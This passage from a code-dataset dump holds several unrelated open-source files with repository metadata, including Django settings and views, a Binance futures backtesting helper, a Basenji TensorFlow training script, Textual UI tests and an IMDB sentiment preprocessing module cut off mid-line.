'project.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'project.wsgi.application'\n\n\n# Database & cache\n\nDATABASES = {'default': env.db('DATABASE_URI')}\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\nUSE_CACHE = env.bool('USE_CACHE', True)\nCACHES = {\n 'default': env.cache(\n 'CACHE_URL', backend='django.core.cache.backends.redis.RedisCache'\n )\n}\n\n\n# Internationalization\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = False\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n\nSTATIC_URL = '/static/'\n\n\n# REDIS related settings\n\nBROKER_URL = env('BROKER_URL')\nRESULT_BACKEND = env('RESULT_BACKEND')\n\n\n# Logging settings\nLOG_LEVEL = env.str('LOG_LEVEL', 'INFO')\nLOG_FILE_NAME = env.str('LOG_FILE_NAME', default=BASE_DIR / 'shortener.log')\nUSE_LOG_FILE = env.bool('USE_LOG_FILE', False)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '{levelname}|{asctime}|{filename}:{lineno} {message}',\n 'style': '{',\n 'datefmt': '%Y-%m-%dT%H:%M:%S',\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n },\n 'loggers': {\n 'project.shortener': {\n 'level': LOG_LEVEL,\n 'handlers': ['console'],\n }\n },\n}\n\nif USE_LOG_FILE:\n file_handler = {\n 'level': LOG_LEVEL,\n 'class': 'logging.FileHandler',\n 'filename': LOG_FILE_NAME,\n 'formatter': 'default',\n }\n LOGGING.get('handlers')['file'] = file_handler # noqa\n LOGGING.get('loggers').get('project.shortener').get('handlers', []).append('file')\n\n\n# Django Rest Framework\nPAGINATION_PAGE_SIZE = env.int('PAGINATION_PAGE_SIZE', default=20)\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': PAGINATION_PAGE_SIZE,\n}\n\n\n# Shortener settings\nBASE_ENCODING = env.str(\n 'BASE_ENCODING', '23456789abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'\n)\nSUBPART_HASH_LEN = env.int('SUBPART_HASH_LEN', 
11)\nSESSION_COOKIE_AGE = env.int('SESSION_COOKIE_AGE', 1209600) # Two weeks\nDIRECTION_LIFETIME_SEC = env.int('DIRECTION_LIFETIME_SEC', SESSION_COOKIE_AGE)\nCACHE_ON_CREATE = env.bool('CACHE_ON_CREATE', True)\nSCHEDULE_CLEAR_DATA_MINUTES = env.int('SCHEDULE_CLEAR_DATA_MINUTES', 60)\nLINES_ON_PAGE = env.int('LINES_ON_PAGE', PAGINATION_PAGE_SIZE)\nLAST_TRY_NUM = env.int('LAST_TRY_NUM', 10)\n","repo_name":"YOricH/TestShortener","sub_path":"project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17091391399","text":"import argparse\nimport glob\nfrom PIL import Image\nimport time\nimport numpy as np\n\nfrom NeuNorm.normalization import Normalization\n\nparser = argparse.ArgumentParser(description='Loading tiff using parallel processing')\nparser.add_argument('-f', '--files', help='list of files to load')\nparser.add_argument('--algo', help='algo to use to load data')\n\ndef run_processing():\n\n args = parser.parse_args()\n list_of_files = glob.glob(args.files)\n\n print(f\"Loading {len(list_of_files)} files\")\n data = []\n\n if args.algo == 'pillow':\n\n print(\"using algo pillow\")\n for _file in list_of_files:\n _image = Image.open(_file)\n _data = np.asarray(_image)\n data.append(_data)\n\n elif args.algo == 'neunorm':\n\n print(\"using algo NeuNorm\")\n o_norm = Normalization()\n o_norm.load(file=list_of_files, gamma_filter=True)\n data = o_norm.data['sample']['data']\n\n print(np.shape(data))\n\nif __name__ == \"__main__\":\n start_time = time.time()\n run_processing()\n end_time = time.time()\n\n print(f\"It took {end_time - start_time}s\")\n","repo_name":"JeanBilheux/python_101","sub_path":"parallelization/python_code_mpi/parallel_processing_loading_images.py","file_name":"parallel_processing_loading_images.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"16542814495","text":"import utils\n\ncubes = set(str(i**3) for i in range(0, 10000))\ndigit_map = {}\nfor cube in cubes:\n key = sum(int(ch) for ch in cube)\n if key not in digit_map:\n digit_map[key] = []\n digit_map[key].append(cube)\n\nMIN_LEN = 5\ndef gen():\n for digit_sum, cubelist in digit_map.items():\n if len(cubelist) < MIN_LEN: continue # not a possible answer so don't bother checking permuts\n for cube in cubelist:\n permuts = [p for p in cubelist if p >= cube and utils.check_permutation(cube, p)]\n if len(permuts) == MIN_LEN: yield min(permuts)\n\nprint(min(gen()))\n","repo_name":"wrschneider/project-euler","sub_path":"p062.py","file_name":"p062.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18093682787","text":"import datetime\nimport functools\nimport time\nimport pandas as pd\nimport pandas_ta as ta\n\nimport os\nimport sys\nfile_dir = os.path.dirname(os.path.realpath(__file__))\nroot_dir = os.path.abspath(file_dir + '/..')\nsys.path.append(os.path.normpath(root_dir)) \n\nfrom binance.futures import Futures \nfrom pprint import pprint\nfrom decimal import *\nfrom service.formula import FormulaService\n\nclass UtilService(object):\n\n def __init__(self):\n self.client = Futures(\n key=os.environ.get('KEY_TESTNET_BINANCE'),\n secret=os.environ.get('SECRET_TESTNET_BINANCE'))\n self.info = None\n\n def compare_time(self, date_time_1, date_time_2): \n return 
(date_time_1-date_time_2).total_seconds() / 60\n\n def mapCandleData(self, res):\n open_time = datetime.datetime.fromtimestamp(res[0]/1000)\n return {\n 'open_time': open_time,\n 'open': float(Decimal(res[1])),\n 'high': float(Decimal(res[2])),\n 'low': float(Decimal(res[3])),\n 'close': float(Decimal(res[4])),\n }\n\n def get_value(self, old_price, new_price, quantity): \n total_old_price = quantity * old_price \n total_new_price = quantity * new_price \n return abs(total_new_price - total_old_price)\n\n def get_candle(self, response, start, end):\n return response[start:end]\n\n def is_take_profit(self, high_price, low_price, take_profit_price):\n if take_profit_price and take_profit_price != 0 and high_price >= take_profit_price: return True\n return False\n\n def is_stop_loss(self, high_price, low_price, stop_loss_price):\n if stop_loss_price and stop_loss_price != 0 and low_price <= stop_loss_price: return True\n return False\n\n def get_fee(self, current_price, quantity, fee_rate=0.0004):\n return quantity * current_price * fee_rate\n\n def finish_order(self, open_time, current_time, high, low, last_price, balance, order):\n take_profit = order['take_profit']\n stop_loss = order['stop_loss']\n quantity = order['quantity']\n leverage = order['leverage'] \n entry = order['entry']\n\n if(self.is_take_profit(high, low, take_profit)):\n balance += self.get_value(entry, take_profit, quantity) - 2*self.get_fee(last_price, quantity)\n order['balance_finish'] = balance\n order['value (+fee)'] = self.get_value(entry, take_profit, quantity) - 2*self.get_fee(last_price, quantity)\n order['is_finish'] = True\n order['close_time'] = str(current_time)\n order['keep (min)'] = self.compare_time(current_time, open_time)\n order['type'] = 'TAKE_PROFIT'\n\n elif(self.is_stop_loss(high, low, stop_loss)): \n balance -= (self.get_value(entry, stop_loss, quantity) + 2*self.get_fee(last_price, quantity))\n order['balance_finish'] = balance\n order['value (+fee)'] = -1 * (self.get_value(entry, stop_loss, quantity) + 2*self.get_fee(last_price, quantity))\n order['is_finish'] = True \n order['close_time'] = str(current_time)\n order['keep (min)'] = self.compare_time(current_time, open_time)\n order['type'] = 'STOP_LOSS'\n \n return balance\n\n def get_precision(self, symbol, precision):\n if self.info == None: \n self.info = self.client.exchange_info()\n for x in self.info['symbols']:\n if x['symbol'] == symbol:\n return x[precision]\n\n def get_quantity_allow(self, allow_money, current_price, leverage, symbol):\n return round(allow_money * leverage / current_price, self.get_precision(symbol, 'quantityPrecision'))\n \n def get_reverse_direction(self, direction):\n if direction == 'BUY': return 'SELL'\n return 'BUY'\n\n def run_report(self, symbol, mark_klines, balance, allow_money, leverage, limit = 31, risk=2, reward=8):\n take_profit = 0\n stop_loss = 0\n end = 41\n book_order = {}\n count_win = 0\n count_lose = 0\n count_draw = 0\n\n for i in range(0, limit - end):\n is_can_next_order = True\n candle = list(map(self.mapCandleData, self.get_candle(mark_klines, i, end + i)))\n direction = FormulaService.formula(candle)\n last_price = candle[-1]['close']\n # if balance < leverage * last_price: \n # print('Balance is insufficient. Balance: {}'.format(balance))\n # assert('Balance is insufficient. 
Balance: {}'.format(balance))\n            #     return None, None, None\n            current_order = None\n            current_book_time = None\n            for book_time, order in book_order.items():\n                if order['is_finish'] == False: \n                    balance = self.finish_order(book_time, candle[-1]['open_time'], candle[-1]['high'], candle[-1]['low'], candle[-1]['close'], balance, order)\n                    if order['type'] == 'TAKE_PROFIT': count_win += 1\n                    if order['type'] == 'STOP_LOSS': count_lose += 1\n                if order['is_finish'] == False: \n                    current_order = order\n                    current_book_time = book_time\n                    is_can_next_order = False \n            if current_book_time != None and current_order != None and is_can_next_order == False and self.get_reverse_direction(current_order['direction']) == direction:\n                book_order[current_book_time]['is_finish'] = 'NONE' \n                book_order[current_book_time]['type'] = 'CHANGE_DIRECTION' \n                book_order[current_book_time]['value (+fee)'] = round(book_order[current_book_time]['fee'], self.get_precision(symbol, 'pricePrecision'))\n                book_order[current_book_time]['balance_finish'] -= round(book_order[current_book_time]['fee'], self.get_precision(symbol, 'pricePrecision'))\n                balance -= book_order[current_book_time]['fee']\n                count_draw += 1\n                is_can_next_order = True\n\n            if direction != '' and is_can_next_order: \n                entry = last_price\n                if direction == 'BUY':\n                    take_profit = round(last_price + last_price * (reward / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n                    stop_loss = round(last_price - last_price * (risk / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n                else: \n                    stop_loss = round(last_price + last_price * (risk / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n                    take_profit = round(last_price - last_price * (reward / 100) / leverage, self.get_precision(symbol, 'pricePrecision'))\n\n                quantity = self.get_quantity_allow(allow_money, last_price, leverage, symbol)\n                quantity_not_leverage = round(quantity / leverage, self.get_precision(symbol, 'quantityPrecision'))\n                if balance <= allow_money: \n                    balance += allow_money\n                    return book_order, balance, count_win, count_lose, count_draw\n                book_order[candle[-1]['open_time']] = {\n                    # 'close_time': '',\n                    'keep (min)': '',\n                    # 'open': candle[-1]['open'],\n                    # 'close': candle[-1]['close'],\n                    # 'high': candle[-1]['high'],\n                    # 'low': candle[-1]['low'],\n                    'balance': balance,\n                    'type': '',\n                    'balance_finish': balance,\n                    'value (+fee)': 0,\n                    'allow_money': allow_money,\n                    'direction': direction,\n                    'entry': last_price,\n                    'quantity': quantity,\n                    'quantity_real': quantity_not_leverage,\n                    'leverage': leverage,\n                    'fee': self.get_fee(last_price, quantity),\n                    'take_profit': take_profit,\n                    'stop_loss': stop_loss,\n                    'is_finish': False,\n                } \n        return book_order, balance, count_win, count_lose, count_draw\n\n    def export_csv_order(self, path, book_order):\n        df = pd.DataFrame(book_order)\n        df = df.transpose()\n        df.to_csv(path)","repo_name":"duytnb79/hilo","sub_path":"service/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18861134500","text":"from textual.app import App\nfrom textual.screen import Screen\nfrom textual.widgets import ListView, Label\nfrom dyno_viewer.components.screens.region_select import RegionSelectScreen\nfrom textual.reactive import reactive\nimport pytest\n\n\n@pytest.fixture()\ndef screen_app():\n    class ScreensApp(App[None]):\n        SCREENS = {"regionSelect": RegionSelectScreen()}\n\n        region = reactive("")\n\n        async def 
on_region_select_screen_region_selected(\n self, selected_region: RegionSelectScreen.RegionSelected\n ) -> None:\n self.region = selected_region.region\n\n return ScreensApp\n\n\nasync def test_list_regions(iam, screen_app):\n async with screen_app().run_test() as pilot:\n await pilot.app.push_screen(\"regionSelect\")\n\n list_view: ListView = pilot.app.query_one(ListView)\n regions = [item.id for item in list_view.children]\n assert regions == [\n \"af-south-1\",\n \"ap-east-1\",\n \"ap-northeast-1\",\n \"ap-northeast-2\",\n \"ap-northeast-3\",\n \"ap-south-1\",\n \"ap-south-2\",\n \"ap-southeast-1\",\n \"ap-southeast-2\",\n \"ap-southeast-3\",\n \"ap-southeast-4\",\n \"ca-central-1\",\n \"eu-central-1\",\n \"eu-central-2\",\n \"eu-north-1\",\n \"eu-south-1\",\n \"eu-south-2\",\n \"eu-west-1\",\n \"eu-west-2\",\n \"eu-west-3\",\n 'il-central-1',\n \"me-central-1\",\n \"me-south-1\",\n \"sa-east-1\",\n \"us-east-1\",\n \"us-east-2\",\n \"us-west-1\",\n \"us-west-2\",\n ]\n\n\n# @pytest.mark.asyncio\nasync def test_select_region(iam, screen_app):\n async with screen_app().run_test() as pilot:\n await pilot.app.push_screen(\"regionSelect\")\n\n assert pilot.app.SCREENS[\"regionSelect\"].is_current\n\n await pilot.press(\"tab\")\n\n assert pilot.app.query_one(ListView).index == 0\n\n await pilot.press(\"down\")\n\n assert pilot.app.query_one(ListView).index == 1\n await pilot.press(\"down\")\n\n assert pilot.app.query_one(ListView).index == 2\n await pilot.press(\"enter\")\n assert pilot.app.region == \"ap-northeast-1\"\n\n assert not pilot.app.SCREENS[\"regionSelect\"].is_current\n","repo_name":"mrllama123/dyno-viewer","sub_path":"tests/unit/screens/test_region_select_screen.py","file_name":"test_region_select_screen.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"1845757302","text":"from __future__ import print_function\n\nimport logging\nfrom queue import Queue\nimport sys\nfrom threading import Thread\nimport time\nimport glob\nfrom os import path\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom basenji import params\nfrom basenji import seqnn\nfrom basenji import shared_flags\nfrom basenji import tfrecord_batcher\nfrom basenji.util import set_logger\n\nFLAGS = tf.app.flags.FLAGS\n\n# /data/genome-attention/tfrecords\n\ndef main(_):\n np.random.seed(FLAGS.seed)\n run(dir=FLAGS.dir)\n\n\ndef run(dir):\n set_logger(path.join(dir, \"experiment.log\"))\n\n # read parameters\n job = params.read_job_params(path.join(dir, \"params.txt\"))\n tfr_dir = job[\"data_dir\"]\n test_file = None\n train_file = None\n test_epoch_batches = job[\"test_epoch_batches\"]\n train_epoch_batches = job[\"train_epoch_batches\"]\n train_epochs = job[\"train_epochs\"]\n\n if tfr_dir:\n # load data\n data_ops, training_init_op, test_init_op = make_data_ops(\n job,\n tfr_dir=tfr_dir\n )\n elif train_file and test_file:\n data_ops, training_init_op, test_init_op = make_data_ops(\n job,\n train_file=train_file,\n test_file=test_file\n )\n else:\n raise Exception(\n 'train and/or test paths missing. 
Aborting.'\n )\n \n save_dir = dir if \"save_dir\" not in job else job[\"save_dir\"]\n model_dir = path.join(save_dir, \"model\")\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n # initialize model\n model = seqnn.SeqNN()\n model.build_from_data_ops(job, data_ops)\n\n # launch accuracy compute thread\n acc_queue = Queue()\n acc_thread = AccuracyWorker(acc_queue)\n acc_thread.start()\n\n # checkpoints\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n train_writer = tf.summary.FileWriter(dir + '/train',\n sess.graph) if dir else None\n\n coord = tf.train.Coordinator()\n tf.train.start_queue_runners(coord=coord)\n\n t0 = time.time()\n print('Initializing...')\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n print('Initialization time %f' % (time.time() - t0))\n\n if 'restart' in job:\n # only include\n restore_variables = [var for var in tf.global_variables() if \"attention\" not in var.name and \"cnn_final\" not in var.name and \"decay_factor\" not in var.name]\n restore_saver = tf.train.Saver(var_list = restore_variables)\n # load variables into session\n restore_saver.restore(sess, job['restart'])\n #else:\n # # initialize variables\n # t0 = time.time()\n # print('Initializing...')\n # sess.run(tf.local_variables_initializer())\n # sess.run(tf.global_variables_initializer())\n # print('Initialization time %f' % (time.time() - t0))\n\n train_loss = None\n best_loss = None\n early_stop_i = 0\n\n epoch = 0\n while (train_epochs is not None and epoch < train_epochs) or \\\n (train_epochs is None and early_stop_i < FLAGS.early_stop):\n t0 = time.time()\n\n # save previous\n train_loss_last = train_loss\n\n # train epoch\n print(\"Training – epoch: {}\".format(epoch))\n sess.run(training_init_op)\n train_loss, steps = model.train_epoch_tfr(sess, train_writer, train_epoch_batches)\n\n # block for previous accuracy compute\n acc_queue.join()\n\n # test validation\n print(\"Validation – epoch: {}\".format(epoch))\n sess.run(test_init_op)\n valid_acc = model.test_tfr(sess, test_epoch_batches)\n\n # consider as best\n best_str = ''\n if best_loss is None or valid_acc.loss < best_loss:\n best_loss = valid_acc.loss\n best_str = ', best!'\n early_stop_i = 0\n saver.save(sess, path.join(model_dir, \"model_best.tf\"))\n else:\n early_stop_i += 1\n\n # measure time\n epoch_time = time.time() - t0\n if epoch_time < 600:\n time_str = '%3ds' % epoch_time\n elif epoch_time < 6000:\n time_str = '%3dm' % (epoch_time / 60)\n else:\n time_str = '%3.1fh' % (epoch_time / 3600)\n\n # compute and write accuracy update\n #accuracy_update(epoch, steps, train_loss, valid_acc, time_str, best_str)\n acc_queue.put((epoch, steps, train_loss, valid_acc, time_str, best_str, train_writer))\n\n # update epoch\n epoch += 1\n\n # finish queue\n acc_queue.join()\n\n if FLAGS.logdir:\n train_writer.close()\n\n\ndef accuracy_update(epoch, steps, train_loss, valid_acc, time_str, best_str):\n \"\"\"Compute and write accuracy update.\"\"\"\n\n # compute validation accuracy\n valid_r2 = valid_acc.r2().mean()\n valid_corr = valid_acc.pearsonr().mean()\n\n # print update\n update_line = 'Train loss: %7.5f, Valid loss: %7.5f,' % (train_loss, valid_acc.loss)\n update_line += ' Valid R2: %7.5f, Valid R: %7.5f, Time: %s%s' % (valid_r2, valid_corr, time_str, best_str)\n update_line += '\\n========================================================================================='\n print(update_line, flush=True)\n\n del valid_acc\n\n\ndef make_data_ops(job, train_file=None, 
test_file=None, tfr_dir=None):\n def make_dataset(loc, mode, is_dir=False):\n \"\"\"\n Creates the tfrecord dataset.\n\n This function is now expected to take either some filename string OR a\n list of filename strings as the data source for tfrecord_dataset.\n \"\"\"\n if is_dir:\n pattern = ''\n if mode == tf.estimator.ModeKeys.TRAIN:\n pattern = 'train-*.tfr'\n elif mode == tf.estimator.ModeKeys.EVAL:\n pattern = 'valid-*.tfr'\n elif mode == tf.estimator.ModeKeys.PREDICT:\n pattern = 'test-*.tfr'\n else:\n raise Exception('unrecognized tfrecord mode. Aborting.')\n pattern = path.join(loc, pattern)\n\n return tfrecord_batcher.tfrecord_dataset(\n pattern,\n job['batch_size'],\n job['seq_length'],\n job['seq_depth'],\n job['target_length'],\n job['num_targets'],\n mode=mode,\n repeat=False\n )\n else:\n return tfrecord_batcher.tfrecord_dataset(\n loc,\n job['batch_size'],\n job['seq_length'],\n job.get('seq_depth', 4),\n job['target_length'],\n job['num_targets'],\n mode=mode,\n repeat=False\n )\n\n if tfr_dir:\n training_dataset = make_dataset(tfr_dir, mode=tf.estimator.ModeKeys.TRAIN, is_dir=True)\n test_dataset = make_dataset(tfr_dir, mode=tf.estimator.ModeKeys.EVAL, is_dir=True)\n else:\n training_dataset = make_dataset(train_file, mode=tf.estimator.ModeKeys.TRAIN)\n test_dataset = make_dataset(test_file, mode=tf.estimator.ModeKeys.EVAL)\n\n iterator = tf.data.Iterator.from_structure(\n training_dataset.output_types, training_dataset.output_shapes)\n data_ops = iterator.get_next()\n\n training_init_op = iterator.make_initializer(training_dataset)\n test_init_op = iterator.make_initializer(test_dataset)\n\n return data_ops, training_init_op, test_init_op\n\n\nclass AccuracyWorker(Thread):\n \"\"\"Compute accuracy statistics and print update line.\"\"\"\n def __init__(self, acc_queue):\n Thread.__init__(self)\n self.queue = acc_queue\n self.daemon = True\n\n def run(self):\n while True:\n try:\n # get args\n epoch, steps, train_loss, valid_acc, time_str, best_str, writer = self.queue.get()\n\n # compute validation accuracy\n valid_r2 = valid_acc.r2().mean()\n valid_corr = valid_acc.pearsonr().mean()\n\n # add summary\n r2_summary = tf.Summary(value=[tf.Summary.Value(tag=\"valid_r2\",\n simple_value=valid_r2)])\n writer.add_summary(r2_summary, steps) \n r_summary = tf.Summary(value=[tf.Summary.Value(tag=\"valid_r\",\n simple_value=valid_corr)])\n writer.add_summary(r_summary, steps) \n loss_summary = tf.Summary(value=[tf.Summary.Value(tag=\"valid_loss\",\n simple_value=valid_acc.loss)]) \n writer.add_summary(loss_summary, steps)\n\n # print update\n update_line = 'Epoch: %3d, Steps: %7d, Train loss: %7.5f, Valid loss: %7.5f,' % (epoch+1, steps, train_loss, valid_acc.loss)\n update_line += ' Valid R2: %7.5f, Valid R: %7.5f, Time: %s%s' % (valid_r2, valid_corr, time_str, best_str)\n logging.info(update_line)\n\n # delete predictions and targets\n del valid_acc\n\n except:\n # communicate error\n print('ERROR: epoch accuracy and progress update failed.', flush=True)\n\n # communicate finished task\n self.queue.task_done()\n\n\nif __name__ == '__main__':\n tf.app.run(main)\n","repo_name":"seyuboglu/genome-attention","sub_path":"bin/basenji_train_queues.py","file_name":"basenji_train_queues.py","file_ext":"py","file_size_in_byte":8705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72911952040","text":"from django.urls import path\n\nfrom apps.user.views import read, create, update, delete, user_register, process_register, 
user_verification, process_verification\n\nurlpatterns = [\n    path('create', create, name='user-create'),\n    path('', read, name='user-read'),\n    path('update/', update, name='user-update'),\n    path('delete/', delete, name='user-delete'),\n    path('register', user_register, name='user-register'),\n    path('register/process', process_register, name='process-register'),\n    path('verification', user_verification, name='user-verification'),\n    path('verification/process', process_verification, name='process-verification')\n]\n","repo_name":"hendrapaiton/sidik","sub_path":"apps/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"30666371659","text":"from django.contrib.auth.mixins import AccessMixin\nfrom django.shortcuts import redirect\nfrom django.views.generic.base import ContextMixin\nfrom django.http import HttpResponseForbidden\nfrom management.models import Organization\n\n\nclass SessionAuthenticationRequiredMixin(AccessMixin):\n    \"\"\"Verify that the current user is authenticated.\"\"\"\n\n    def dispatch(self, request, *args, **kwargs):\n        if not request.session.get(\"presspass_authenticated\", False) == True:\n            return redirect(\"management:login\")\n        if \"org_id\" in kwargs and kwargs[\"org_id\"] not in [\n            org.id for org in Organization.for_session(request.session)\n        ]:\n            return HttpResponseForbidden(\"403 forbidden\")\n        if \"org_id\" in kwargs:\n            request.organization = Organization.objects.get(pk=kwargs[\"org_id\"])\n        return super().dispatch(request, *args, **kwargs)\n\n\nclass SessionOrgContextMixin(ContextMixin):\n    def get_context_data(self, *args, **kwargs):\n        context = super(SessionOrgContextMixin, self).get_context_data(*args, **kwargs)\n        context.update(\n            dict(organizations=Organization.for_session(self.request.session))\n        )\n        return context\n\n\nclass OrgContextMixin(ContextMixin):\n    def get_context_data(self, *args, **kwargs):\n        context = super(OrgContextMixin, self).get_context_data(*args, **kwargs)\n        context.update(\n            dict(organization=Organization.objects.get(id=self.kwargs[\"org_id\"]))\n        )\n        return context\n","repo_name":"news-catalyst/openalerts","sub_path":"openalerts/management/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73656701800","text":"import setuptools\nimport mimicLOB\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name= mimicLOB.__name__,\n    version= mimicLOB.__version__,\n    author=\"FDR\",\n    author_email=\"FDR0903.DEV@gmail.com\",\n    description=\"Simulation at the LOB level\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"\",\n    packages=setuptools.find_packages(),\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n)","repo_name":"FDR0903/mimicLOB","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"37367037826","text":"# 1. Make sure you have a 'cache' folder\n# 2. Use only the get_train_data(ratio) or the get_test_data(ratio) function\n#\t\tafter first call, they load cached data\n#\t\tratio parameter defines the splitting ratio of the train data\n# 3. 
For loading the final Test data, use Get_Testing_Data() function\n#\t\tUse the Write_Predictions(predictions) to write the data\n#\t\tinto the format that Kaggle asks for\n# 4. You can delete the content of the cache folder to start over, or\n# \t\tcall preprocess(True), so it overwrites the existing cache\nimport pandas as pd\nimport numpy as np\nfrom nltk.corpus\t\t\t\timport stopwords\nfrom bs4\t\t\t\t\t\timport BeautifulSoup\nfrom sklearn.model_selection\timport train_test_split\nimport nltk, re, cPickle, os.path, sys, gzip\n\nlabelled_data_path = \"data/labeledTrainData.tsv\"\t # For supervised learning\ntest_data_path \t = \"data/testData.tsv\"\t\t\t # For Kaggle score\nunlabelled_data_path = \"data/unlabeledTrainData.tsv\" # For Unsupervised learning\nX_Train_cache_path = \"cache/X_train_%.1f.bin\"\nY_Train_cache_path = \"cache/Y_train_%.1f.bin\"\nX_Test_cache_path = \"cache/X_test_%.1f.bin\"\nY_Test_cache_path = \"cache/Y_test_%.1f.bin\"\nTest_cache_path = \"cache/Test.bin\"\nUnlabelled_cache_path = \"cache/Unlabelled.bin\"\n\nrandom_seed_for_splitting = 42;\n\ndef get_train_data(ratio = 0.7):\t# Loads train data from cache (creates it if needed)\n\tpreprocess(ratio)\n\tX_train, Y_train = load_train_data()\n\t#print \"Preprocessing : Completed. \"\n\treturn X_train, Y_train\n\t\ndef get_test_data(ratio = 0.7):\t# Loads test data from cache (creates it if needed)\n\tpreprocess(ratio)\n\tX_test, Y_test = load_test_data()\n\t#print \"Preprocessing : Completed. \"\n\treturn X_test, Y_test\n\t\ndef Get_Testing_Data():\n\tif not os.path.isfile(Test_cache_path):\n\t\trprint(\"Loading raw test data\")\n\t\tdata = pd.read_csv(test_data_path, header=0, delimiter=\"\\t\", quoting=3)\n\t\tpair = (clean_data(data), data['id'])\n\t\tdel data\n\t\trprint(\"Saving Test data to cache\")\n\t\tsave_zipped_pickle(pair, Test_cache_path)\n\telse:\n\t\trprint(\"Loading Test data from cache\")\n\t\tpair = load_zipped_pickle(Test_cache_path)\n\treturn pair[0], pair[1]\t# text, ids\n\t\ndef Get_Unlabelled_Data():\n\tif not os.path.isfile(Unlabelled_cache_path):\n\t\trprint(\"Loading raw unlabelled data\")\n\t\tdata = pd.read_csv(unlabelled_data_path, header=0, delimiter=\"\\t\", quoting=3)\n\t\tclean_reviews = clean_data(data)\n\t\tdel data\n\t\trprint(\"Saving unlabelled data to cache\")\n\t\tsave_zipped_pickle(clean_reviews, Unlabelled_cache_path)\n\telse:\n\t\trprint(\"Loading unlabelled data from cache\")\n\t\tclean_reviews = load_zipped_pickle(Unlabelled_cache_path)\n\treturn clean_reviews\n\ndef Write_Predictions(path, ids, predictions):\n\toutput = pd.DataFrame( data={\"id\":ids, \"sentiment\":predictions} )\n\toutput.to_csv(path, index = False, quoting = 3)\n\t\ndef preprocess(ratio = 0.7, rebuild_cache = False):\n# Ratio*10 should be an integer, it is the ratio of train data\n# If there is no cached data for the given ratio, it creates it\n\texists = os.path.isfile(X_Train_cache_path % ratio)\t\\\n\t\t and os.path.isfile(Y_Train_cache_path % ratio)\t\\\n\t\t and os.path.isfile(X_Test_cache_path % ratio)\t\\\n\t\t and os.path.isfile(Y_Test_cache_path % ratio)\n\tif not exists or rebuild_cache:\n\t\tX_train, X_test, Y_train, Y_test = get_train_test_sets(ratio)\n\t\tsave_train_data(X_train, Y_train, ratio)\n\t\tsave_test_data(X_test, Y_test, ratio)\n\ndef rprint(str): # Next print overwrites this, e.g. use to indicate progress\n\tsys.stdout.write(\" Preprocessing : \" + str + \" \\r\")\n\tsys.stdout.flush()\n\ndef review_to_words(raw_review , stops): # cleans a review\n\treview_text = 
BeautifulSoup(raw_review, \"html.parser\").get_text().lower()\n\tletters_only = re.sub(\"[^a-z]\", \" \", review_text)\n\twords = letters_only.split()\n\tmeaningful_words = [w for w in words if not w in stops]\n\treturn( \" \".join( meaningful_words ))\n\ndef clean_data(data): \t\t\t\t# cleans raw data\n\trprint(\"Building stopwords dictionary...\")\n\tclean_reviews, reviews = [], data[\"review\"]\n\tstops = set(stopwords.words(\"english\")) # precalculating makes it faster\n\tn, i = len(reviews), 0\n\tfor rev in reviews:\n\t\t#if i % (n/200) == 0:\n\t\trprint(\"Cleaning reviews (%d %%) %d\" % (100*i/n, i))\n\t\tclean_reviews.append(review_to_words(rev, stops))\n\t\ti = i + 1\n\treturn clean_reviews\n\t\ndef get_train_test_sets(ratio = 0.7):\n\trprint(\"Loading raw train data...\")\n\tdata = pd.read_csv(labelled_data_path, header=0, delimiter=\"\\t\", quoting=3)\n\tclean_reviews = clean_data(data)\n\trprint(\"Splitting cleaned data...\")\n\tX_train, X_test, Y_train, Y_test = train_test_split(clean_reviews, 